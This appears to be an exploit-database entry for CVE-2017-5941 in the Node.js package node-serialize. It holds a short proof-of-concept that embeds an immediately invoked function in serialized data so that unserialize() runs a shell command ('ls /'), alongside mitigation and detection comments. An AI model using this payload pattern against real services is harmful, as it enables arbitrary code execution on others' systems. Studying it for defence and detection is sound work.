Node.JS - 'node-serialize' Remote Code Execution



EKU-ID: 7882 CVE: 2017-5941 OSVDB-ID:
Author: OpSecX Published: 2018-08-28 Verified: Verified


// Demonstration input for CVE-2017-5941. node-serialize's unserialize() treats
// a string value that starts with the _$$ND_FUNC$$_ marker as function source
// and evaluates it. The source below ends in "()", so the function is invoked
// during that evaluation: deserialization alone is enough to run it.
//
// Mitigation: do not pass data from an untrusted party to unserialize(); parse
// it with JSON.parse and validate the resulting structure instead.
// Detection: the _$$ND_FUNC$$_ marker appearing in inbound request data is a
// usable signature for attempts against this code path.
const nodeSerialize = require('node-serialize');

// The embedded function only lists the root directory and logs the result,
// which is sufficient to show that code carried in the serialized data runs.
const serializedInput = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';

// The return value is discarded and no property of it is ever called; the
// directory listing is printed as a side effect of unserialize() itself.
nodeSerialize.unserialize(serializedInput);